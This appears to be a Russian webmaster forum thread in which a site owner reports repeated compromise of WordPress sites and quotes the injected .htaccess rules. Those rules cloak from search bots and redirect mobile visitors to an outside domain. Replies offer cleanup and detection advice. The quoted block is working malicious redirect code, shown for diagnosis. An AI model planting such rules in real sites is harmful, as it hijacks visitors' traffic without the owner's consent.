Форум Сайтостроение Веб-строительство

Уязвимость WordPress

12 3
medea
На сайте с 19.09.2007
Offline
297
medea
3435

Уже второй раз ломают все сайты на сервере. Админ утверждает, что дело в какой-то уязвимости WP, но отловить не может.

Симптомы вот такие:

В .htaccess появляется следующий код: 

RewriteEngine   on

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]

RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]

RewriteRule    (.*)    http://flash008.com/s/1160    [L,R=302]

Бывает еще, что JS с таким же смыслом появляется в index.php

Есть идеи, откуда дровишки?

Продвижение сайтов (http://www.iqpromo.ru/) под моим присмотром :)
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#1
medea:
Есть идеи, откуда дровишки?

Если дырка в скриптах - смотреть в логах по дате изменения файла. Думаю, Админ сумеет.

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
R
На сайте с 24.01.2008
Offline
180
Алексей
#2

Уязвимости могут быть и в модулях и плагинах, возможно сами занесли заразу в виде загрузчиков, а через них уже все это вредоносное ставят, например шаблоном, тут нужно визуально смотреть.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
callidus
На сайте с 18.07.2011
Offline
335
callidus
#3

Это код сливания трафика на мобильные партнеркэ типа smsпират и иже с ними.

Надоело самостоятельно собирать семантическое ядро ( http://goo.gl/rekQL9 )? Отдай на аутсорс.
Z
На сайте с 13.12.2009
Offline
452
zusull
#4

medea, там все просто. какой-то модуль или шаблон с бэк-дором. Прогера цепляйте, пусть просмотрит все файлы (автопоиском есссно), где найдет, исправит и все.

Как вариант снести сайт, поставить движок заново (именно заново), импортнуть базу, прицепить старый шаблон. И тогда шерстить придется только файлы шаблона, а не всего движка.

и так сделать со всеми сайтами, т.к. похоже у вас шелы на всех сайтах висят или хостинг такой кривой, что дает доступ ко всему фтп любому из сайтов

Консультации, seo-аудиты - https://seo-consulting.su Профессионально и без воды
griale
На сайте с 01.03.2010
Offline
90
griale
#5

есть спец плагин-который кричит когда какой то файл изменился

medea
На сайте с 19.09.2007
Offline
297
medea
#6
zusull:
medea, там все просто. какой-то модуль или шаблон с бэк-дором. Прогера цепляйте, пусть просмотрит все файлы (автопоиском есссно), где найдет, исправит и все.
Как вариант снести сайт, поставить движок заново (именно заново), импортнуть базу, прицепить старый шаблон. И тогда шерстить придется только файлы шаблона, а не всего движка.
и так сделать со всеми сайтами, т.к. похоже у вас шелы на всех сайтах висят или хостинг такой кривой, что дает доступ ко всему фтп любому из сайтов

Если в этот топик зайдёт прогер, способный это сделать, пусть напишет мне в личку, пожалуйста. спасибо )

Garin33
На сайте с 31.08.2009
Offline
169
Garin33
#7
griale:
есть спец плагин-который кричит когда какой то файл изменился

Вот он. ТС'у рекомендую попробовать его.

Потому что Drupal - это круто.
FaeR
На сайте с 19.03.2009
Offline
151
FaeR
#8
medea:
Если в этот топик зайдёт прогер, способный это сделать, пусть напишет мне в личку, пожалуйста. спасибо )

Вот обратитесь поможет с вашей проблемой.

VPS от 2.9 евро, сервера от 29 евро (https://bill2fast.com/aff.php?aff=1063)
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#9

WP последний? Плагины все обновлены?

P.S. Могу посмотреть...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Metal Messiah
На сайте с 01.08.2010
Offline
152
Metal Messiah
#10

слей бекап файлов на винт и ищи слово flash008 или eval

anonymous, думай что говоришь и не забывай подписать отзыв :)
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий